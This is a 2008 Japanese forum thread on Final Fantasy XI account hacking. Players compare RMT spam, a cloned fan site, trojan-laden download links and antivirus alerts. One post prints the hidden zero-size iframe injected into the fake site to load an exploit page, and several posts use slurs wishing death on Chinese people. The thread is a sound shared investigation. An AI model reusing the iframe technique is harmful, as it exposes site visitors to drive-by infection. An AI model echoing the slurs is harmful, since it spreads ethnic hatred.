メールアイコンが点滅してたんでPOLいって見てきた MMORPGの通貨安く売りますだのPLしますだのRMT関連の英語のメールだったorz @pol.comに無差別送信だろうか、これ
659 :
既にその名前は使われています :2008/09/19(金) 00:24:48 ID:EKXtzkUl
245からあげ
660 :
既にその名前は使われています :2008/09/19(金) 01:19:35 ID:hAysWqou
>>658 フレンドメッセージじゃなくて?
まぁ、フレメッセ送れるくらいならPOLのメールも送りたい放題だろうけど
661 :
既にその名前は使われています :2008/09/19(金) 03:03:00 ID:EKXtzkUl
220からあげ
662 :
既にその名前は使われています :2008/09/19(金) 03:41:02 ID:K2fmtKdb
ヴァナモン行ったら、ファイルのダウンロードをブロックしました【北】 最近見に行っても、真っ白なページか、数頁見ると真っ白なページになる。 なんだこれ
663 :
既にその名前は使われています :2008/09/19(金) 04:04:28 ID:LvnTVfEM
URLチェッカーで覗いたけど、ループタグないのgzipがわけわからん
お、インラインフレームタグないのわけワカラン糞長いスクリプト消されたっぽいな 対応はええええ
ごめん、消えてなかった 気のせいだった
ワカランからプロに任せるわ
aguseのスクリーンショットでは普通に見えるけど、Gatewayで行って見ると真っ白だね。何故?
669 :
既にその名前は使われています :2008/09/19(金) 04:45:37 ID:EKXtzkUl
ソースチェッカーもxreaかぁ・・・ 弾いてるから使えないなぁ・・・
>>658 アドレスはばれたってことだな。
デフォルトだとIDとの関連もばれるのだろうか?
最近はパスをランダムでブルートフォースとか書いてあっ
W32/Rontokbro@mmとかそんな感じのがでてきた これは垢ハック系なのかな?
672 :
既にその名前は使われています :2008/09/19(金) 05:15:17 ID:zU/SY8Nf
ぐぐるとすぐ出てきたけど システムを不安定にする大量メール送信ワームだな
そうなんだ じゃあゲームの方はとりあえず心配ないみたいだね 一応削除はしておくけど・・・
674 :
既にその名前は使われています :2008/09/19(金) 07:02:37 ID:JxCSphnP
俺が2CH書き込みに使ってるサイトがゼリアでした!
675 :
既にその名前は使われています :2008/09/19(金) 09:14:25 ID:XLIB9MoQ
676 :
既にその名前は使われています :2008/09/19(金) 09:35:11 ID:zL52NyXZ
677 :
既にその名前は使われています :2008/09/19(金) 10:50:52 ID:a1QIo7yK
開示すれば間違いなく中国に逆らえばウィルスを放ってくるようになるよな。
678 :
既にその名前は使われています :2008/09/19(金) 11:37:13 ID:iWQjCmdj
相変わらずあの国は馬鹿丸出しだな。
679 :
既にその名前は使われています :2008/09/19(金) 11:41:37 ID:a1QIo7yK
そのうち セキュリティを守るためにATMのソースを開示せよ とか言ってくるんじゃね?
680 :
608続き :2008/09/19(金) 12:13:18 ID:bLP/d9QW
>>611 および皆様
亀ですみません。ありがとうございます。
/seedsについては 以下の内容であってますでしょうか?
*/seedsというマルパクサイトがあった。
*Backdoor.Win32.Agent.rqkは/seedsとは関連性ない。(ハンゲスタータの誤検出で、報告済)
>>512 >>521 の報告で
avast!がJS:Agent-AU [Expl]とVBS:Malware-gen検知
>>512 の報告で
re11.htmが反応
>>526 の報告で
偽サイトは多数のスクリプト検知
>>560 >>611 の報告で(同じ方?)
NIS2008が HTTP Yahoo! Messenger CYTF Ctrl GetFile を警告
(続く)
681 :
608続き その2 :2008/09/19(金) 12:14:39 ID:bLP/d9QW
見た目がそっくり?でURLも模倣ということで
悪意を持って作られた事に間違いはないと思うのですが
MMOのアカハク目的と断定するにはちょっと材料が足りない感じです。
ソースその他具体的な判断材料をお持ちの方
日曜まで(月曜には撤収予定)
ttp://ffxi ■yukikuma■com/に ロダおいときますので
よろしければ圧縮してうぷお願いできませんでしょうか。
(xrea広告つきサーバ 5Mまでです。ごめんなさい。)
サイト管理人と同一人物かどうか確認が必要な場合
今日中にサイトのメールフォームからご連絡いただければ
上記ドメインのメールで返信させていただきます。
一方的なお願いでスレ汚し申し訳ありませんでした。
さすが中国。普通なら恥ずかしくていえないことを堂々と言ってのけるぜ。 どんだけ技術を盗み、悪用しようとしてるんだ。
683 :
既にその名前は使われています :2008/09/19(金) 12:16:28 ID:a1QIo7yK
福田ならサラッと開示しそうだったから辞めてよかったな。
684 :
既にその名前は使われています :2008/09/19(金) 14:04:54 ID:XLIB9MoQ
238からあげ
685 :
既にその名前は使われています :2008/09/19(金) 15:33:32 ID:KTml9jVr
200こえたぞーagu
686 :
611 :2008/09/19(金) 16:18:46 ID:1kn7D2Kz
>>608 (
>>680 )
>*/seedsというマルパクサイトがあった。
MMOのアカウントハッキング目的なのかどうなのかいまいち判断がつきませんが、模倣HPは存在してました
>*Backdoor.Win32.Agent.rqkは/seedsとは関連性ない。(ハンゲスタータの誤検出で、報告済)
偶然が重なっただけのようで、関連性はなさそうです。
あと、seedsに接続したときにNIS2008が弾いた侵入は
HTTP SnapShot Viewer ActiveX File Download
HTTP BlackIce ActiveX Download Activity
HTTP Yahoo! Messenger CYTF Ctrl GetFile
このみっつでした(履歴を確認してみっつ弾いてました)
>>526 はわたしですが、Firefoxのスクリプト反応で、本物は4個、偽物は20個でした
わたし(
>>611 )は
>>560 さんとは別人です
687 :
既にその名前は使われています :2008/09/19(金) 16:50:39 ID:RblufQ2J
688 :
既にその名前は使われています :2008/09/19(金) 17:32:43 ID:rm4nB2ZM
2赤でアンマリ使ってないほうのキャラで、アカハックくらったのだが、帰ってきてびっくりした。 ショボイ装備と数万のギルしかなかったんだが、3000万ギルあるぞ。 中華のギル中継に使われてたのかな〜。ボーナス付きでまじうれしい。
689 :
既にその名前は使われています :2008/09/19(金) 17:47:53 ID:gHRDHmxy
この類の話何回目くらいだろう…20は見たよねw って保守
690 :
既にその名前は使われています :2008/09/19(金) 17:49:05 ID:KTml9jVr
羨ましいというより黙ってたら間違いなくBANだなーくらいにしか思わないな
691 :
既にその名前は使われています :2008/09/19(金) 17:55:44 ID:JxCSphnP
>>688 スクエニから対応の遅れのお詫び
そう考えて俺はいただいた。
692 :
既にその名前は使われています :2008/09/19(金) 17:57:14 ID:JxCSphnP
693 :
既にその名前は使われています :2008/09/19(金) 18:03:34 ID:ZdZgo8qp
ID:JxCSphnPはID:rm4nB2ZMなの?
694 :
既にその名前は使われています :2008/09/19(金) 19:29:02 ID:qDqxOo6m
キティか業者のタゲそらしだろ ほっときな
695 :
既にその名前は使われています :2008/09/19(金) 19:40:31 ID:mf6Cdvub
俺はNAっぽいフレ登録されたオマケだけだったがw 中華が転売したのかな
差出人が---のRMT案内メールって、昔のフレのPOLアドレス使って送られてるんだろ? 何かムカツクな
697 :
既にその名前は使われています :2008/09/19(金) 21:10:38 ID:LvnTVfEM
ヴァナモンは安全?
698 :
既にその名前は使われています :2008/09/19(金) 21:17:03 ID:a1QIo7yK
ネットに絶対安全なんてものはない。
巻き戻し申請中でもPOLにはインできるんだよね? POLのメールのパスワード変え忘れていたので、 POLにインしようとしたらパスワードが違うと出てくるという事は またやられたのかな?クリーンインストールしてからFF11も入れなおして、 セキュリティソフトもPG2も入れてるのにどこでやられたのだろう・・・
>>699 PG2だけなら効果は無いに等しいのでは?
上に出てるギルが増えていた件はフレも言ってたよ。金額とか確認していないし。 もうログインしてこない感じだからその後は確認できないけど。
いや、バスターの2008も入れてブラウザもFirefoxにしてNoScriptmeも 入れたのに。もうPC版でやるのはやめよう。360版買ってこようかな。
最近はヴァナモンすら使うの控えてるな FF用語辞典で調べ物したりしてるし あとはElemenとかえふめもとか大手どころくらいしか怖くてつかえないな リンクなんて何処も論外すぎてふめねー なんなのこれフザケテルノー
ヴァナモンなんて実際にハッキングされたし 大手だからって安心できるわけじゃないだろうに FF専用マシンが絶対必要
もうシナ畜糞過ぎ 死ねよ中国人…
箱○の最適化とPS3版FF11クライアント出ればありがたいんだがな〜
708 :
既にその名前は使われています :2008/09/19(金) 22:36:57 ID:urUENrtI
やった、規制解けた;; sage進行は危険なのでageマスね^^
709 :
既にその名前は使われています :2008/09/19(金) 23:07:39 ID:QlACI3qz
ハッキング復元してもらって、一週間も経たないうちにまたハッキングさ れてしまいました。 ウインドウズのアップデートもセキュリティソフトのチェックも随時行っ ていました。 パスワードもハッキング直後と復元後に2回変更したし、インターネット の検索もスクウェアFF公式HPぐらいしか見てないのに、どうしてこう なってしまうのか全く分かりません。 それにしても前回と同じく、「プレイオンラインIDまたはプレイオンラ インパスワードが違います」というメッセージが出て、今まさにキャラク ターを操作してお金やアイテムを競売で奪っているのを分かっていながら、 インフォメーションセンターに「時間外」という理由で連絡すら出来ない のが歯がゆくてなりません。 復元は1度しかしか出来ないということで、もう何を言っても「終わり」 なんですけどね・・・
何も原因ないわけないだろー 1.ウィルスを隔離出来てなかった 2.ブログかどっかで罠URL踏んだ
711 :
既にその名前は使われています :2008/09/19(金) 23:15:46 ID:uTtco0tC
>>704 FF用語辞典なんて所も信用なんて無い。
ってか、ネットにつなげてる時点で、
信用なんて目の前で自分で火をつけて燃やしてるようなものだからな。
因みに俺のPCにはウイルスソフトぐらいしか入れてないけど、一度もパスなんて抜かれた事が無い。
だって。そもそもFF入ってないんだぜwwwww
回線だって完全に別さあ!今のネット社会。これぐらいアタリマエだぜ!
712 :
既にその名前は使われています :2008/09/19(金) 23:18:56 ID:uTtco0tC
>>710 の言うとおりだな。
ってか、本当に被害にあったならまずテンプレよろ。
何処が悪かったかそれでいえると思うぜ。
ハ れて ウ ン て し パ ド の ク な の そ 回 イ 違 タ や イ ン の ん 復 い な 改行が変だったから見てみたけど、縦でも斜めでもないようだ
714 :
既にその名前は使われています :2008/09/19(金) 23:24:38 ID:SPGdggI/
どうせまた、実はクリリンしてないwとか、FlashPlayer最新w(のつもり)とかだろ
>>713 おまえ無駄なことに労力かけるなよ・・・w
それはともかく隔離せずアップデートやらしたって無駄だわなぁ
>>709 マズお前は間違いなくHDフォーマット・PCの初期化を怠っていたろう?
そしてパスワードも相変わらずPCに保存していたんだろう
717 :
既にその名前は使われています :2008/09/19(金) 23:50:33 ID:mf6Cdvub
HDDとっかえた俺最強
718 :
既にその名前は使われています :2008/09/19(金) 23:50:35 ID:MqeFg/Eh
どーせクリーンインスコもしてなくて 大丈夫^^ とか自分に言い聞かせたんだろうな。
719 :
既にその名前は使われています :2008/09/20(土) 00:04:02 ID:C/i18cyW
おやすみ前のあげ。
720 :
既にその名前は使われています :2008/09/20(土) 00:20:31 ID:uY1ubo99
被害者に冷たいスレになりました ・・・いつものことか
721 :
既にその名前は使われています :2008/09/20(土) 00:22:26 ID:1r73rTCq
一回目は仕方ないにしても二回目はな
722 :
608,680続き 1/2 :2008/09/20(土) 00:22:28 ID:H+6B+i3P
ソースを上げてくださった方 ありがとうございます。
<!--履歴-->というコメントアウトの後</tr>と<td>の間に
<iframe width='0' height='0' src='
http://www ●geocities●jp/ff11seeds/gei.htm'></iframe>
というサイズ0のiframeがありました。
>>686 さんのエラーメッセだと
Microsoft Access の脆弱性
http://www.microsoft.com/japan/security/bulletins/ms08-041e.mspx BlackIceの脆弱性(なんでしょこれは IBMが昔出してたファイアウォールくらいしか思いつかないw)
を利用して ヤフメッセで送らせるって感じみたいですね。
RealPlayerの識別子があったというre11.htmはgei.htmに読み込まれてたのでしょうか。
indexページはオリジナルのソース丸パクで上記のiframeと自動挿入部分以外の相違点が見つからなかったので
思いつくのはcssファイルに仕込まれてた可能性くらいですが
どのようにして Atlas/re11.htmに飛ばされたのか気になります。
引き続き情報募集中です。
ジオ関連で補足続きます。
723 :
既にその名前は使われています :2008/09/20(土) 00:24:07 ID:reZ+om+R
クリーンインストールしてなさそうだし、冷たくされてもしょうがない^^
724 :
2/2 :2008/09/20(土) 00:32:01 ID:H+6B+i3P
補足 ジオは自動挿入されるアクセス解析と広告にJSを使ってます。 ブラウザからソースをとると元サイトの広告と解析がはいります。 <!-- text below generated by server. PLEASE REMOVE --> ってコメントアウトされてるところです。 そのソースをそのまま偽サイトにアップしているので 偽サイトの分も自動挿入が入ってるんですね。 で 上部にはバナー広告2個分のスクリプトがあります。 いったんうぷって またブラウザからソース取った可能性もありますが オリジナルの<body>位置が</head>より前にあるため自動挿入がバグってるのかもです。 下にアクセス解析3つ。これは広告に対応した数。 なのでスクリプト数はオリジナルよりかなり多くなっているわけです。 ジオのアカウントは同名のヤフーのアカウントがあると作れません。 ジオの/seedsというURLはヤフーのseedsというIDに優先権があります。 つまりヤフーのIDとしてまだ生きているseedsというアカウントを持っている人もしくはそのアカウントをハックした何者かが偽サイトを作りました。 最近は削除されてないので不明ですが以前は同一のURLを再使用することはできなかったかと思います。 ですが生きているIDなので今後ジオで別のサイトを作ることが可能です。コワス
725 :
既にその名前は使われています :2008/09/20(土) 00:33:58 ID:aKcw1mT6
POLの起動時と終了時のエラー Winアップデートできない シャットダウンにえらい時間かかる とかの症状なくてハック来た人っているの?
726 :
611 :2008/09/20(土) 00:34:09 ID:uY1ubo99
>>608 (
>>680 ・
>>722 )
IFRAMEを見つけたのがジオに削除依頼をしたあとでしたので
gei.htmを確認しようとしたときは消されちゃってました・・・
なにぶんわたしのところには「感染しても安全な環境」がありませんので
もう侵入検知でてんぱっちゃって、わ〜わ〜あたふたしてましたから
適切な対応ができていなかったことをお詫びしておきますm(_ _)m
727 :
既にその名前は使われています :2008/09/20(土) 00:37:38 ID:uY1ubo99
>>725 wzcsvbxm.dll ← こっちのウィルスは前兆現象が出るようですけど
Kernaeghdrv.dll ← こっちのほうはFFに関しては前兆現象は報告されてないと思います
728 :
既にその名前は使われています :2008/09/20(土) 00:40:47 ID:Y6oHQQsn
2回目やられたひとはとりあえず2回目以降も復旧してもらえるように要望メール出したらいいんじゃないの 素人考えだけど復旧するには人件費が結構かかるはずだから「有料でもいいです」とか書き添えてさ
729 :
既にその名前は使われています :2008/09/20(土) 00:45:07 ID:70xkkVug
flash player10を薦めている人がいる 英語なのに大丈夫かな
730 :
既にその名前は使われています :2008/09/20(土) 00:55:53 ID:uY1ubo99
>>729 Flash Playerの10って確認できないんですけど、出てます?
731 :
既にその名前は使われています :2008/09/20(土) 01:02:24 ID:H+6B+i3P
>>726 私は個人的興味ってスタンスですし。
お詫びなさるようなことはなにもないかと。
サイトを丸パクするのは実はとても簡単なことなので
FF11のアカウントの問題としてだけではなくインターネットをする上で
丸パク+リダイレクトや罠スクリプトという実例を多くの方に知っていただけるということに意義があると思います。
なんかこいつエラソウなこといってますが【許してください。】
今日は上げて寝ます。おやすみなさい。
732 :
既にその名前は使われています :2008/09/20(土) 01:03:28 ID:H+6B+i3P
っと おまけ FP10は ラボで落とせたかと。 安定版のリリースはまだじゃないでしょうか。
733 :
既にその名前は使われています :2008/09/20(土) 01:08:52 ID:uY1ubo99
>>732 ありがとうございます
ラボで確認しました
734 :
既にその名前は使われています :2008/09/20(土) 01:17:11 ID:QLMWPXsl
業者の宣伝メッセが来たって人、けっこういるのかな?今日俺んとこにも来たんだが。 差出人が「---」みたいになってた。 試しに自分のフレ宛にメッセを送る画面を開いて、自分の名前を「---」に変更しようとしたけど 出来なかった。 最近インしなくなったフレがいるんで、そいつがハクられて経由してきたのかな〜。 こっちがフレ削除しても向こうが消さない限り送られてくるのかな。 防ぎようがなくて気持ち悪い。
735 :
既にその名前は使われています :2008/09/20(土) 01:25:25 ID:JlQLP77e
巻き戻しは1回限りだけど、アカウントの復帰は対応して貰えるのだよね? 巻き戻し中でよかったと考えるべきか。
736 :
既にその名前は使われています :2008/09/20(土) 01:29:22 ID:cL3rl5vZ
>>734 ハックした奴のアドレス帳(フレ登録者)勝手に辿って
ダイレクトメール送ってくるのかw
フレをハックした奴からそんなもん送りつけてくるとかwwww
喧嘩売ってるか以前にまともじゃないよ、中華。
POLどっかやられたのかとおもったらそういうことなのか。
737 :
既にその名前は使われています :2008/09/20(土) 01:46:51 ID:QLMWPXsl
>>736 >>226 を見て、フレ経由なのかと想定。
別ハンドルの倉庫キャラにはメッセきてないんで、可能性高いかなと。
フレ経由で合ってたとしても、差出人名がへんてこな文字列になってたのは絶対変だよな。
一応STTには報告してみるか。
738 :
既にその名前は使われています :2008/09/20(土) 02:18:54 ID:zw76i3zp
自分のとこにもきたけど、POLの自キャラ名と違うハンドル名の方にだけ 送られてきているからハックされたフレリストとかではなさそう。 もちろんそのハンドルでPOL上で他人とやり取りしたことはない。 業者はアドレス解析して送ってきてるんだと思う
739 :
既にその名前は使われています :2008/09/20(土) 02:22:40 ID:zw76i3zp
GMコールしてみたところ 「フレンド登録メール送信の際にコメントを書き換えて送ってきている」 というような返信があった
740 :
既にその名前は使われています :2008/09/20(土) 02:36:53 ID:uY1ubo99
フレ登録から送ってきてるなら、それだけハックされた人が多いというか ハックされて泣き寝入りしてる人が多いというか、そういうことなのかな
741 :
既にその名前は使われています :2008/09/20(土) 02:44:48 ID:WFcHy96Y
742 :
既にその名前は使われています :2008/09/20(土) 02:45:34 ID:WFcHy96Y
対象の詳細↓ ファイヤーウォール ランカード及びスイッチングハブ VPN ルータ インテレジェントカード ICチップ用OS バックアップ及びリストアデータ OS データベースシステム 迷惑メール防止システム 不正アクセス侵入探知システム ネットワーク監視システム ログ収集、解析ソフト ファイル改竄探知システム どうみても不正アクセスする気満々です。本当にありがとうございました
743 :
既にその名前は使われています :2008/09/20(土) 02:51:03 ID:uY1ubo99
>>741 ナマ貼りはよくないですよ
とくにPDFは安全が確認できないから開くのが怖い
744 :
既にその名前は使われています :2008/09/20(土) 02:52:44 ID:WFcHy96Y
>>743 いいたいことはわかるけど、これぐらいはアドレスみて判断してくれよ・・・
745 :
既にその名前は使われています :2008/09/20(土) 02:55:05 ID:uY1ubo99
>>744 そこが安全だと「あなた」が保障してくれるなら?
746 :
既にその名前は使われています :2008/09/20(土) 02:57:24 ID:WFcHy96Y
ただのバカだった。
747 :
既にその名前は使われています :2008/09/20(土) 02:58:02 ID:VfncLR3v
どっちも馬鹿だー
748 :
既にその名前は使われています :2008/09/20(土) 02:58:16 ID:uY1ubo99
>>746 わたしはITMediaのニュースでさえナマ貼りは控えてますよ
なにが安全かがわからない状況になってきてますから、ナマは控えて
いただいたほうがいいと思います
749 :
既にその名前は使われています :2008/09/20(土) 03:02:28 ID:WFcHy96Y
>>748 たぶん言ってもわからないだろうけど、最後にいっとくね。
CSAJソースと、ITMedia程度を比較しないでね。
750 :
既にその名前は使われています :2008/09/20(土) 03:05:13 ID:uY1ubo99
>>749 だから、そういうあなた的視点の考え方が危ないと言っているんですけど
そこを話してもわからないようですからわたしもやめときます
751 :
既にその名前は使われています :2008/09/20(土) 03:09:51 ID:VfncLR3v
もうやめて><
752 :
既にその名前は使われています :2008/09/20(土) 03:11:41 ID:Pgp5fgQU
もうやめてー><
753 :
既にその名前は使われています :2008/09/20(土) 03:20:51 ID:0yj/nKdl
w
754 :
既にその名前は使われています :2008/09/20(土) 03:30:58 ID:dsQbmc5g
すべての人間がアドレスで判断できるとは限らないですよ
似たアドレスの罠サイトを踏まされる可能性もあるわけですし
>>744 は自分基準で思いやりの欠片もないように見えました
垢ハクスレでは他に比べて特にみんな敏感になっているから直アドは自重するのがおすすめかもw
755 :
既にその名前は使われています :2008/09/20(土) 03:32:46 ID:uY1ubo99
ジオサイトの偽物騒動があったばかりです ナマ貼りが安全だという認識をほかに与えないようにしてください 「www.csaj.jp」が安全だという思い込みがあると、www.csajs.jpとか 「www.csaj_.jp」とか似せたURLが出てきたときに、それも安全だと クリックしてしまう可能性は否定できません テンプレには外部URLを踏むのは自己責任だと書きましたが、わざわざ 罠を作る(あるいは作らせる)必要はないと思います
756 :
テンプレ改定 :2008/09/20(土) 03:35:35 ID:uY1ubo99
>>730 英語のRC版なら最近。
正式版じゃないからAdobe Labsページから。
ベータ/RC版をすすめるやつもどうかしてると思うけどね。
単に無責任な新しもの好きなだけか。
ナマ貼りなんてオレ用語をテンプレに含められても困る。 脊髄反射で事を起こすにしても、もうちょっと推敲してからにしてくれ。
普通なら「直接リンク」「直リン」だよねぇ、表現としては
760 :
テンプレ改定 :2008/09/20(土) 03:58:43 ID:uY1ubo99
761 :
既にその名前は使われています :2008/09/20(土) 04:00:20 ID:0yj/nKdl
762 :
既にその名前は使われています :2008/09/20(土) 05:38:22 ID:uY1ubo99
203からあげ
763 :
既にその名前は使われています :2008/09/20(土) 05:49:03 ID:gZutXPqa
一度ハッキングされても、その後のPOLIDはそのまんまだよね? だとしたら、簡単なパス変更だと力技(数打ちゃ当たる方式)で破られてるってことはない? ツ−ルとかあるかは知らないけどさ(3回打ち間違えたらロック掛かるとかなかったよね?) 仮想化して、FFとブラウジングとで切り分けするしかないかな
764 :
既にその名前は使われています :2008/09/20(土) 06:17:31 ID:fH9tjXTX
怖かったのでPG2導入しました;; 難しかったです;;
765 :
699 :2008/09/20(土) 06:45:41 ID:zPGII5gj
パスワードを再発行してもらって、ソフトウェアキーボードで入力し POLに接続。パスを数字、小文字、大文字の合せて15桁に変更。 キャラの被害確認してPOL落ちる前に再度パス変更。 巻き戻し依頼して昨日、POL入ろうとするまで一度もPOLには 繋いでいなかった。 巻き戻し完了のメール連絡は着てないけど、公的書類送って3週間は経つから 念のため再度新しいパス発行してもらうまで、アカウント凍結して貰ってた方が いいのかな。
防げるのはキーロガーだけ それ以外のウイルスに感染してるならIDとPassは海の向こうに行った。
767 :
既にその名前は使われています :2008/09/20(土) 08:00:50 ID:m0S/8ikW
昨夜からなんか頻繁にPG2がブロックしてるんだが・・・なんなんだろう 58.19.24.200 60.190.218.40 61.191.58.178 124.49.93.220 124.90.200.158 124.115.211.22 218.15.62.78 221.0.186.14 222.187.221.86
768 :
既にその名前は使われています :2008/09/20(土) 08:14:48 ID:SKfVvAjV
aguseで見てみただけだけど中国の色んな所からだねw 韓国が1個だけまじってたけど
769 :
既にその名前は使われています :2008/09/20(土) 10:08:41 ID:2/F0O9/a
216
770 :
既にその名前は使われています :2008/09/20(土) 10:44:14 ID:uuoQ1brA
夜中にくだらないことで言い合いをしてたと思ったら、それで一人で盛り上がって 勝手にテンプレ改訂かよ。しかも改定案じゃなくて、改訂決定。バカなの?死ぬの?
771 :
既にその名前は使われています :2008/09/20(土) 10:48:11 ID:474D43d7
ナマ貼り云々言ってる人って専ブラ使ってないの? Janeだと頭のh抜いたってリンクされるんだが
772 :
既にその名前は使われています :2008/09/20(土) 10:49:35 ID:B3lJNa5r
差出人---のメッセージのことだけど POL上から適当に探して送って あと、その送った時に使ってたハンドルを削除したらそうならない?
773 :
既にその名前は使われています :2008/09/20(土) 10:53:11 ID:k/XTQ6yf
>>734 みたいな宣伝メールがうちのとこにも
例のごとく差出人が----で英文だた
無差別っていうか全ユーザーに送ってるんかな
774 :
既にその名前は使われています :2008/09/20(土) 11:18:43 ID:aBbuG4nn
2垢もってるけどそーいうメルは来てないな〜 ただフレが少ない上に全員PS2使いだからかもしれんけどw
775 :
既にその名前は使われています :2008/09/20(土) 12:51:37 ID:2xSQoEPW
保守 メアドは変更しても届くの?変更してないから届くの?
776 :
既にその名前は使われています :2008/09/20(土) 13:42:38 ID:QLMWPXsl
>>772 なるほど〜。
その方法なら自分でも確認できるけど、やり方わかったところで根本的な解決にならないからなあ;;
>>774-775 メールじゃなくて、フレンドメッセージです。
>>773 こっちがハンドル変更したりフレ削除しても、向こうが登録してる限りオフラインでリストに載った
ままになるんだっけ?
誰ともフレ登録してない倉庫キャラに届いたという話も出てたので、無差別かもしれないし、防ぎ
ようがなさそうだなあ。
気持ち悪いだけで実害はないけど、なんかやだよね。
777 :
既にその名前は使われています :2008/09/20(土) 14:47:55 ID:zw76i3zp
>>776 自分のとこにきたヤツの宛先が、自キャラとリンクさせてないPOL上だけのハンドルへだったので
ヴァナ上のPCに対してではなくPOLのアカウントに対して送ってきてるんだと思う
>>774 フレ登録申し込んだときに相手に「フレンドになろうよ!」って送られてくるコメントを
ああいう風に書き換えているわけ
おそらくツールでハンドル名ランダム総当りで探り当てて送信して言ってるんだと思う
ランダムなら18ハンドル作ってる俺んとこにも届きそうなもんだけど来てないよ
>>778 単に見つけられてないだけだろう
業者向こうの人間だから、向こうにわかるような名前とかでないとでてこないんじゃないかな
ABCD1234みたいなデフォの奴に送ってんじゃね?
以前、リンクシェル絡みで何か流出してなかったっけ? 例のオークションサイトのキャラ詳細みたいなのもどうやって抜いて?るんだろ 本人が登録してるのかな フレのキャラ名のリンクまである
782 :
既にその名前は使われています :2008/09/20(土) 17:29:45 ID:reZ+om+R
259からあげ
783 :
既にその名前は使われています :2008/09/20(土) 18:39:06 ID:20ELIdSw
202から上げ
784 :
既にその名前は使われています :2008/09/20(土) 19:43:35 ID:x8clkbxd
age
785 :
既にその名前は使われています :2008/09/20(土) 20:45:39 ID:aBbuG4nn
上へ参りまぁす
786 :
既にその名前は使われています :2008/09/20(土) 20:50:33 ID:4JkEBbda
知り合いがアカハクくらったので代理でGMコール FF内からコール>「最終ログイン時間と全てのキャラ名、ワールド添えてPOLからコールしてください」 情報添えてPOLからコール>「最終ログイン時間が日と曜日しかないので判断できません」 POLから再コール>凍結しました、と一方的に通知が来て終了 長い時間まったんだから、日付くらい確認しにチャットに応じてくれてもいいと思うのだが…。 とりあえず代理コールはこんな感じでできた。
787 :
既にその名前は使われています :2008/09/20(土) 20:52:02 ID:1r73rTCq
>>786 乙だけど本人確認の条件はあんまりここに明記しないほうがいいかもだ
788 :
既にその名前は使われています :2008/09/20(土) 21:14:42 ID:3LfsuaJ5
RMTメッセは、POLサーチでAから順番に送ってるだけじゃない? /anon してないと、サーチひっかかるし。
今朝anonしてたけど名無しメッセが届きました。 友達になろうよ!だけのメッセでしたが プロフィールは公開してないので、趣味が同じ等の理由で フレ登録がくるような状況ではないのです。 GMコールしてみたところ、名無しはPOL上から登録を 申し込んだのだろう。RMTに関する情報としてSTTへ報告を してもらえると幸いであるとのことでした(要約してあります) 受信拒否することでこちらが不利益になる情報は渡らないと 言われましたが、やっぱり気味が悪いですね。 うっかりメッセならいいけど、それならネーム名前消さないよね…。
790 :
既にその名前は使われています :2008/09/20(土) 23:28:52 ID:qEHAWLNM
age つかsage荒らし来てるのかね? お気に入りのスレがいくつもいきなり落ちてるw
791 :
既にその名前は使われています :2008/09/20(土) 23:36:50 ID:1r73rTCq
>>790 スレ保持数の関係で定期的にスレ番300まで圧縮されてるんじゃないかな?
792 :
既にその名前は使われています :2008/09/20(土) 23:41:13 ID:U8Cd4yl0
sageと落ちるのに何が関係あるのかわからない
793 :
既にその名前は使われています :2008/09/20(土) 23:46:40 ID:gU1vtPer
>>790 ID:iXjUQ91d だな
>>792 目立たないようにsageながら大量のスレを保守する奴がいる
794 :
既にその名前は使われています :2008/09/20(土) 23:59:11 ID:2xSQoEPW
>>792 新たな書き込みを見る事で賑わっている、と判断し保守ageを怠る事を期待したsage進行。
795 :
既にその名前は使われています :2008/09/21(日) 01:32:14 ID:JR9zXrVl
おやすみ前の217からあげ
PS2使いだけど昨日初めて英語のRMT広告みたいなのがPOLにきたな。 かなりびびった。
797 :
既にその名前は使われています :2008/09/21(日) 02:42:31 ID:VrkGexcy
先ほどゲーム内で見知らぬキャラからtellがきました。
内容は
???????>>I Quit...
http://www ■geocities■com/tempupload77/ffxiwarper.zip Enjoy
というものでした(送り主の名前は?で伏せ、URL内のドットは全て■にしました)
送り主に返信しても離席設定で届かず暫くするとサーチにかからなくなり
怪しさ全開なのですが。
ハックやウィルスに詳しい方 お暇でしたら上記URLを閲覧するとどうなるか教えていただけませんでしょうか?
798 :
既にその名前は使われています :2008/09/21(日) 02:43:04 ID:SruM6EHv
業者くさいのからtellが来て、URLが乗ってた。 こんなの飛ぶ奴はいないと思うけど、多分アカハック系だと思う。 フレにも数人来てた。 必要だったらURL転載するけど、とりあえず自重。
799 :
既にその名前は使われています :2008/09/21(日) 02:44:10 ID:SruM6EHv
>>797 これとまったく同じだ。
鯖はどこ?こっちは狼。
800 :
既にその名前は使われています :2008/09/21(日) 02:49:39 ID:VrkGexcy
>>799 同じく狼です こわいねぇ
zipの前のコロンを■にし忘れていました ごめんなさい。
801 :
既にその名前は使われています :2008/09/21(日) 03:04:19 ID:2Oie9f1/
>>797 zipの中身はffxiwarper.exeというファイル1個で、Avast!でWin32 Trojan:Genが検出された。
具体的にどうなるかは試してない。
802 :
既にその名前は使われています :2008/09/21(日) 03:09:57 ID:VrkGexcy
>>801 情報ありがとうございます。
見知らぬ人物からのオススメURLでトロイ検出は
ネトゲ関連のトロイと考えていれば怪我はなさそうですね。
804 :
既にその名前は使われています :2008/09/21(日) 03:22:14 ID:QKbSkeMh
俺も狼ですが、鯖スレやまわりのフレにもまったく同じ文章が送られており 頭文字が後半の自分にも送られてきたため、かなりの人数に送られていると思います 他鯖のかたも注意されたし
805 :
既にその名前は使われています :2008/09/21(日) 03:23:30 ID:QKbSkeMh
「鯖スレ」→「鯖スレ住人」に訂正
806 :
既にその名前は使われています :2008/09/21(日) 03:23:45 ID:LzgbETIY
もはや何でもありだな。MMO運営するのも大変だなこりゃ。
807 :
既にその名前は使われています :2008/09/21(日) 03:24:30 ID:VrkGexcy
>>803 情報ありがとうございます。
ハックした内容をそこへ送るとかでしょうね。
上記URLにアクセスしないのが一番ですね。
808 :
既にその名前は使われています :2008/09/21(日) 03:29:14 ID:LQ8JD8Zi
どうせ中国人だろ?ホントにトラブルしか起こさない連中だな。 一人残らず死んでほしい。
最近シナ畜業者も露骨になってきたな〜 焦ってるのかね?
810 :
797 :2008/09/21(日) 03:36:44 ID:VrkGexcy
情報のお寄せありがとうございました。 業者の根絶を祈りつつ、これから寝ることにします。 ではまた。
811 :
既にその名前は使われています :2008/09/21(日) 07:05:36 ID:QS4Art6L
age
812 :
既にその名前は使われています :2008/09/21(日) 07:18:03 ID:4VWPi9V8
>>809 規制も厳しくなってるしなぁ
一般の客は今後更に危険にさらされる機会が増える、一層セキュリティには気をつけないとね。
スクエニもこれまで以上のスピードで対応しないと俺らが困るw
最近はスクエニもユーザー本意の対応になってきただろうか?
地震など災害への対応も日々怠りなく。
813 :
